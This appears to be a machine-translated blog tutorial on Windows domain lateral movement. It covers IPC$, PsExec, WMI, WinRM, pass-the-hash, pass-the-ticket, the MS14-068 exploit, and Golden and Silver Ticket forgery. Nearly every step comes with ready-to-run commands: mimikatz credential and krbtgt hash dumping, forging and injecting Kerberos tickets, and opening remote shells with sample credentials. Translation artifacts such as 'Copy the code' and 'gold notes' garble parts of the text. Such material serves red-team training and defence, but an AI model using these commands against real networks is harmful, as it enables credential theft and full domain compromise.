After the attacker uses the jumpers to further invade the Intranet server, the attacker obtains the permissions of the target system in various ways and moves the plaintext password or Hash value of the user across the Intranet.
The simplest way is to log in to the remote server using a plain text password. Here, we will sum up the idea of Windows horizontal movement and attack.
1. IPC connection
Establish IPC$session connections with target machines by verifying user names and passwords, view shared resources on remote hosts, perform upload/download, create scheduled tasks, and so on.
Net use \\<DC IP>\ IPC $"password" /user:"username"Copy the code2, PsExec
PsExec is a lightweight Telnet alternative that allows you to execute processes on other systems and provide complete interactivity to console applications without manually installing client software.
Download address:
https://docs.microsoft.com/zh-cn/sysinternals/downloads/psexec
Copy the codeReturn an interactive shell:
Psexec. exe \\10.1.1.1 -u administrator -p abc123! cmd.exeCopy the codeAt the same time, the PsExec module is also integrated under Metasploit.
3, WMI
WMI (Windows Management Specification) is a model for users to manage local and remote computers. It allows you to access, configure, manage, and monitor almost all Windows resources.
Remote create process:
Wmic/node: 10.1.1.1 / user: administrator/password: abc123! process call create "cmd.exe /c ipconfig"Copy the code4, WinRM
WinRM refers to Windows remote management service. You can operate Windows command line through remote connection to WinRM module. By default, the listening ports 5985 (HTTP) and 5986 (HTTPS) will be enabled by default after 2012.
Winrs - r: http://10.1.1.1:5985 -u: administrator - p: abc123! "whoami /all"Copy the code5. Pass the hash
By obtaining the hash of the target user, the attacker can use the hash of the user to simulate the user and obtain the access permission of the user.
MSF provides the psexec module for Hash passing, using only password hashes, to execute arbitrary commands:
6. Pass the ticket attack
After obtaining the domain controller permission, you can export the Ticket from the domain controller memory for logging in to the domain controller.
Attack flow:
Step 1: Export the ticket in memory using mimikatz
mimikatz# sekurlsa::tickets /export
Copy the code
Step 2: Select a file and import it on the host of common users.
Step 3: Obtain domain controller rights
7, the MS14-068
MS14068 is a privilege promotion vulnerability that allows ordinary users to raise rights to domain control rights. The attacker can construct a specific request package to achieve the purpose of promoting permissions. Check whether patch KB3011780 is installed on the domain controller host.
Attack flow:
Step 1: TGT generation using MS14-068 forgery
MS14-068.exe -u [email protected] -p abc123! -s S-1-5-21-735015318-3972860336-672499796 -d dc.test.com
Copy the code
Step 2: Use Mimikatz to write the TGT ticket obtained by the tool to memory and create a cache certificate
mimikatz#kerberos::ptc [email protected]
Copy the code
Step 3: Obtain permissions
PsExec.exe \\dc cmd.exe
Copy the code8. Golden Ticket
The principle of gold note is to forge TGT with THE HASH of KRBTGT. As long as a TGT with high privileges is owned, it can be sent to TGS in exchange for ST of any service.
Step 1: Get the SID and hash of KRBTGT
The SID and hash values of KRBTGT are obtained directly from the mimikatz command.
lsadump::dcsync /domain:test.com /user:krbtgt
Copy the code
Step 2: Forge gold notes
Fake TGT using Mimikatz
kerberos::golden /admin:administrator /domain:test.com /sid:S-1-5-21-735015318-3972860336-672499796 /krbtgt:dc717a226a07d0f6adbcd9c0337c6513 /ticket:golden.kiribi
Copy the code
Step 3: Obtain permissions
Clear the local ticket cache and import forged gold tickets.
Kerberos ::list # Check the tickets saved locally kerberos:: Purge # purge the local ticket cache Kerberos :: PTT golden. Kiribi # Import the forged gold tickets Kerberos ::list # Check the tickets saved locallyCopy the code
Step 4: Use forged gold notes
Use psexec.exe directly to remotely log in and execute commands
PsExec.exe \\dc cmd.exe
Copy the code
9. Silver Tickets
The principle of Silver Tickets is to forge a Service Ticket (ST), so they can obtain specified access rights by using the hash of the user account without going through the KDC.
Forged bills are only valid for some services. The following services can be used:
| Service Type | Service Silver Tickers |
|---|---|
| WMI | The HOST, RPCSS |
| Powershell Remoteing | The HOST, the HTTP |
| WinRM | The HOST, the HTTP |
| Scheduled Tasks | HOST |
| LDAP, DCSync | LDAP |
| Windows File Share (CIFS) | CIFS |
| Windows Remote ServerAdministration Tools | RPCSS, LDAP, CIFS |
Step 1: Build the scene
Symptom Access denied is displayed when two hosts in the same domain controller access files of the Win-server in file sharing mode.
Step 2 Obtain the NTLM HASH
Log in to the Win-Server server and export the hash using Mimikatz
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit">log.txt
Copy the code
Step 3: Forge bills
kerberos::golden /domain:test.com /sid:S-1-5-21-735015318-3972860336-672499796 /rc4:943434a10b5134c0b1ef5e8f1ef9b020 /user:test /service:cifs /target:win-server.test.com /ptt
Copy the code
Step 4: Access the shared file
